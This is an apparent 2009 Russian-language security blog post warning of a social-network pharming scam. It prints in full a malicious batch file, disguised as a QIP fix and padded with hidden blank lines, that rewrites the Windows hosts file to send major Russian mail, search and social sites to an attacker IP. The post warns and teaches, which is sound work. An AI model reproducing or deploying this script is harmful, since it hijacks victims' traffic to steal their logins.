Похоже, началась очередная эпидемия фарминг через социальные сети.
В одной из известных популярных социальных сетей (а может быть, не в одной?) друзьям через систему личных сообщений рассылаются следующие сообщения:
Один нужный мне файл у меня не работает, можете сами проверить?На что человек, естественно, получает ответ:
могу, привет)И через некоторое время он получает следующее сообщение:
urlshort.me **файл запускается без ошибок?))(Я специально закрыл адрес звездочками, чтобы не кликать :) Как человек, наученный жизненным опытом (в том числе и своим), я перешел по ссылке с помощью браузера в режиме инкогнито.
Сокращенная ссылка ведет на один из популярных файлообменников, с которого предлагают скачать файл.
qip_unfium.bat
Ничего не подозревающий пользователь нажимает на этот файл, желая помочь другу справиться с проблемой с Quip Unfium, и.
выполняется следующий код:
Кстати, перед телом самого скрипта 662 пустые строки.@rem ----- ExeScript Options Begin ----- @rem ScriptType: console @rem DestDirectory: temp @rem Icon: default @rem ----- ExeScript Options End ----- @echo off echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts
Последствия выполнения этого сценария не нужно упоминать.
Мораль? В стотысячный раз напоминаю: остерегайтесь фейков и проверьте у друзей, действительно ли они отправили вам такую ссылку.
UPD от 16 ноября 2009: Вторая часть Марлезонского балета .
:-) Теги: #фермерство #Социальные сети #vkontakte.ru #odnoklassniki.ru #mail.ru #google.ru #rambler.ru #mail.i.ua #информационная безопасность
-
Оптимизация Сети Для Unreal Engine 4
19 Oct, 24 -
Интерфейс С Человеческим Лицом
19 Oct, 24 -
Почему Программистов Не Учат?
19 Oct, 24